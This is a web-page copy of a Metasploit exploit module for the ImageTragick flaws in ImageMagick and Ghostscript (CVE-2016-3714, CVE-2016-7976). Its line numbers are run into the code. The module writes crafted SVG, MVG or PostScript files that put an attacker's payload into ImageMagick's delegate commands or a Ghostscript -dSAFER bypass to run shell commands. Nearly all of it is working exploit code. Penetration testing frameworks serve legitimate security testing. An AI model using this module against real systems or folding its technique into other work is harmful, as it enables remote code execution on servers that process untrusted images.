Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/fileformat/imagemagick_delegate.rb
Views: 11623
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit6Rank = ExcellentRanking78include Msf::Exploit::FILEFORMAT910def initialize(info = {})11super(update_info(info,12'Name' => 'ImageMagick Delegate Arbitrary Command Execution',13'Description' => %q{14This module exploits a shell command injection in the way "delegates"15(commands for converting files) are processed in ImageMagick versions16<= 7.0.1-0 and <= 6.9.3-9 (legacy).1718Since ImageMagick uses file magic to detect file format, you can create19a .png (for example) which is actually a crafted SVG (for example) that20triggers the command injection.2122The PostScript (PS) target leverages a Ghostscript -dSAFER bypass23(discovered by taviso) to achieve RCE in the Ghostscript delegate.24Ghostscript versions 9.18 and later are affected. This target is25provided as is and will not be updated to track additional vulns.2627If USE_POPEN is set to true, a |-prefixed command will be used for the28exploit. No delegates are involved in this exploitation.29},30'Author' => [31'stewie', # Vulnerability discovery32'Nikolay Ermishkin', # Vulnerability discovery33'Tavis Ormandy', # Vulnerability discovery34'wvu', # Metasploit module35'hdm' # Metasploit module36],37'References' => [38%w{CVE 2016-3714},39%w{CVE 2016-7976},40%w{URL https://imagetragick.com/},41%w{URL https://seclists.org/oss-sec/2016/q2/205},42%w{URL https://seclists.org/oss-sec/2016/q3/682},43%w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},44%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},45%w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}46],47'DisclosureDate' => '2016-05-03',48'License' => MSF_LICENSE,49'Platform' => 'unix',50'Arch' => ARCH_CMD,51'Privileged' => false,52'Payload' => {53'BadChars' => "\x22\x27\x5c" # ", ', and \54},55'Targets' => [56['SVG file', template: 'msf.svg'], # convert msf.png msf.svg57['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg58['PS file', template: 'msf.ps'] # PoC from taviso59],60'DefaultTarget' => 0,61'Notes' => {62'Stability' => [CRASH_SAFE],63'SideEffects' => [],64'Reliability' => [],65'AKA' => ['ImageTragick'],66'RelatedModules' => [67'exploit/unix/fileformat/ghostscript_type_confusion',68'exploit/multi/fileformat/ghostscript_failed_restore'69]70}71))7273register_options([74OptString.new('FILENAME', [true, 'Output file', 'msf.png']),75OptBool.new('USE_POPEN', [false, 'Use popen() vector', true])76])77end7879def exploit80if target.name == 'SVG file'81p = Rex::Text.html_encode(payload.encoded)82else83p = payload.encoded84end8586file_create(template.sub('echo vulnerable > /dev/tty', p))87end8889def template90if datastore['USE_POPEN']91t = 'popen'92else93t = 'delegate'94end9596begin97File.read(File.join(98Msf::Config.data_directory, 'exploits', 'imagemagick', t,99target[:template]100))101rescue Errno::ENOENT102fail_with(Failure::NoTarget, "Target has no #{t} support")103end104end105end106107108